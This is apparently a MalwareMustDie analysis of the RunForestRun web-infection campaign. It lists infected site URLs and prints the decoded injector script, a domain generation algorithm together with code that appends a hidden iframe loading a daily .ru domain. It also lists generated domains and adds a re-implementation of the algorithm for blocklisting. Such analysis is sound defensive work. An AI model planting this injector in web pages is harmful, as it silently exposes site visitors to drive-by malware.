We released the full details in our pastebin here: --->>[PASTEBIN], and summarize them as follows.
New infectors have been popping up since Oct 26th at the URLs below:
h00p://fig.is/2010/12/ny-heimasiða-felags-islenskra-gigtarlækna/?kna/feed
h00p://fig.is/2012/01/althjodlegt-thing-um-scleroderma/feed
h00p://fig.is/2010/12/ny-heimasiða-felags-islenskra-gigtarlækna/feed
h00p://fig.is/2010/12/ny-heimasi%C3%B0a-felags-islenskra-gigtarl%C3%A6kna/?kna/feed
h00p://fig.is/2010/12/ny-heimasi?kna/feed
h00p://www.imaginactionstunts.com/calendar/past
h00p://www.imaginactionstunts.com/action-team/profil-mathieu-ledoux/feed/
h00p://www.imaginactionstunts.com/action-team/profil-sebastien-rouleau/feed
h00p://www.imaginactionstunts.com/action-team/profil-mike-chute/feed
h00p://www.imaginactionstunts.com/action-team/profil-thomas-liccioni
h00p://www.imaginactionstunts.com/action-team/profil-jean-sebastien-cote/feed/
h00p://www.imaginactionstunts.com/action-team/profil-stephane-lefebvre/feed/
h00p://browsersphere.com/
h00p://suesat-recycle.com/plugins/system/rokbox/rokbox.js
h00p://www.cityenvies.com/
h00p://icaihyd.org/js/stepcarousel.js
h00p://isveren.net/organize_sanayi_bolgeleri
h00p://www.anteaagency.cz/js/jquery.colorbox-min.js
h00p://idealbench.com/js/bottom.js

The decoded pseudorandom generator (recovered from the hex-encoded payload) is as follows:

    // Schrage-style multiplicative generator; note Q is a float (M / A), not an
    // integer division, so this is not a bit-exact Park-Miller MINSTD
    function nextRandomNumber() {
        var hi = this.seed / this.Q;
        var lo = this.seed % this.Q;
        var test = this.A * lo - this.R * hi;
        if (test > 0) {
            this.seed = test;
        } else {
            this.seed = test + this.M;
        }
        return (this.seed * this.oneOverM);
    }
    // The seed uses only the local month, day of month and an afternoon flag
    // (hour > 12): the year, minute and second are never used
    function RandomNumberGenerator(unix) {
        var d = new Date(unix * 1000);
        var s = d.getHours() > 12 ? 1 : 0;
        this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF) + (Math.round(s * 0xFFF));
        this.A = 48271;
        this.M = 2147483647;
        this.Q = this.M / this.A;
        this.R = this.M % this.A;
        this.oneOverM = 1.0 / this.M;
        this.next = nextRandomNumber;
        return this;
    }
    function createRandomNumber(r, Min, Max) {
        return Math.round((Max - Min) * r.next() + Min);
    }
    function generatePseudoRandomString(unix, length, zone) {
        var rand = new RandomNumberGenerator(unix);
        var letters = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',
                       'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z'];
        var str = '';
        for (var i = 0; i < length; i++) {
            str += letters[createRandomNumber(rand, 0, letters.length - 1)];
        }
        return str + '.' + zone;
    }
    // Injects a hidden iframe pointing at today's generated .ru domain
    setTimeout(function () {
        try {
            if (typeof iframeWasCreated == "undefined") {
                iframeWasCreated = true;
                var unix = Math.round(+new Date() / 1000);
                var domainName = generatePseudoRandomString(unix, 16, 'ru');
                ifrm = document.createElement("IFRAME");
                ifrm.setAttribute("src", "h00p://" + domainName + "/ｒunforestrun?sid=botnet2");
                ifrm.style.width = "0px";
                ifrm.style.height = "0px";
                ifrm.style.visibility = "hidden";
                document.body.appendChild(ifrm);
            }
        } catch (e) { }
    }, 500);

Two things to keep in mind when reproducing this: the seed is built only from the victim's local month, day and whether the hour is past 12, so each calendar day yields exactly two domains (and the same two domains recur every year on that date), and in the decoded script the first letter of the "runforestrun" path is the fullwidth character U+FF52 ("ｒ"), not an ASCII "r".

All URLs were extracted with the snippets below; the complete URL list is pasted here: --->>[PASTEBIN]
Sat Dec 31 19:00:01 EST 2011 - http://yhzktxbspmeioevy.ru/runforestrun?sid=botnet2
Sun Jan 1 07:30:00 EST 2012 - http://kxfcnwlyyohascji.ru/runforestrun?sid=botnet2
Sun Jan 1 19:59:59 EST 2012 - http://ndvgpxdugiihprox.ru/runforestrun?sid=botnet2
Mon Jan 2 08:29:58 EST 2012 - http://wjikjkybqouienfm.ru/runforestrun?sid=botnet2
Mon Jan 2 20:59:57 EST 2012 - http://yowoyitslewxwwrl.ru/runforestrun?sid=botnet2
Tue Jan 3 09:29:56 EST 2012 - http://jwkynwfxjqdqqmji.ru/runforestrun?sid=botnet2
Tue Jan 3 21:59:55 EST 2012 - http://lcbfcpzjpyvoheuj.ru/runforestrun?sid=botnet2
Wed Jan 4 10:29:54 EST 2012 - http://vjnhblgryauqcpmr.ru/runforestrun?sid=botnet2
Wed Jan 4 22:59:53 EST 2012 - http://xocnrffrwjwryily.ru/runforestrun?sid=botnet2
Thu Jan 5 11:29:52 EST 2012 - http://iwoughjskqxnoury.ru/runforestrun?sid=botnet2
Thu Jan 5 23:59:51 EST 2012 - http://kcgbtgkouhxwzqce.ru/runforestrun?sid=botnet2
Fri Jan 6 12:29:50 EST 2012 - http://tirdttcivfplnrds.ru/runforestrun?sid=botnet2
Sat Jan 7 00:59:49 EST 2012 - http://gwtrhozqbvudulyl.ru/runforestrun?sid=botnet2
Sat Jan 7 13:29:48 EST 2012 - http://jbkxeiekxelpidpi.ru/runforestrun?sid=botnet2
(and so on...)

What these findings show:
1. This time the pseudorandom generator was used to extract not just the domains but the full infected URLs.
2. Double, possibly triple, obfuscation was found in the recent pseudorandom landing HTML.
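As an added example (not the malware's own code and not part of the original MalwareMustDie write-up), here is a cleaned-up re-implementation of the decoded generator above with the seed inputs made explicit, so the two candidate domains for any calendar day can be computed offline for blocklisting or sinkholing. The function names seedFor, generateDomain, domainsForDay and domainForDate are mine; the constants and the floating-point arithmetic are copied from the decoded script, because Q and R are computed without integer truncation there and swapping in true Park-Miller constants would change the output.

```javascript
// Added example: re-implementation of the decoded RunForestRun DGA.
// Constants and arithmetic are the malware's; function names are assumptions.
const A = 48271;
const M = 2147483647;
const Q = M / A;            // float, exactly as in the malware (NOT Math.floor)
const R = M % A;            // 3399
const ONE_OVER_M = 1.0 / M;
const LETTERS = 'abcdefghijklmnopqrstuvwxyz';

// Seed depends only on month (0-based), day of month and an afternoon flag.
// Year, minute and second never enter it, so the same two domains recur every
// year on the same calendar day.
function seedFor(month, dayOfMonth, afternoon) {
  const s = afternoon ? 1 : 0;
  return 2345678901 + month * 0xFFFFFF + dayOfMonth * 0xFFFF + Math.round(s * 0xFFF);
}

// One step of the malware's Schrage-style LCG; next() returns a float in (0, 1).
function makeGenerator(seed) {
  let state = seed;
  return function next() {
    const hi = state / Q;
    const lo = state % Q;
    const test = A * lo - R * hi;
    state = test > 0 ? test : test + M;
    return state * ONE_OVER_M;
  };
}

// Builds one 16-letter label exactly as generatePseudoRandomString does:
// index = Math.round((Max - Min) * r + Min) with Min = 0, Max = 25.
function generateDomain(month, dayOfMonth, afternoon, length = 16, zone = 'ru') {
  const next = makeGenerator(seedFor(month, dayOfMonth, afternoon));
  let str = '';
  for (let i = 0; i < length; i++) {
    str += LETTERS[Math.round((LETTERS.length - 1) * next())];
  }
  return str + '.' + zone;
}

// Mirrors what runs in the victim's browser: local time, and "afternoon" means
// getHours() > 12, so 12:xx still belongs to the morning half of the day.
function domainForDate(d) {
  return generateDomain(d.getMonth(), d.getDate(), d.getHours() > 12);
}

// Both domains a calendar day can produce, e.g. for a daily blocklist.
function domainsForDay(month, dayOfMonth) {
  return [
    generateDomain(month, dayOfMonth, false),
    generateDomain(month, dayOfMonth, true),
  ];
}

if (typeof require !== 'undefined' && require.main === module) {
  // The two candidate domains for 31 December (month index 11).
  console.log(domainsForDay(11, 31));
}
```

When checking output against the extracted list above, remember the malware uses the victim's local clock: the timestamps in the list are EST, so the generator has to be fed the EST month, day and afternoon flag, not UTC.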
#MalwareMustDie! (Special thanks to EO for the great crack!)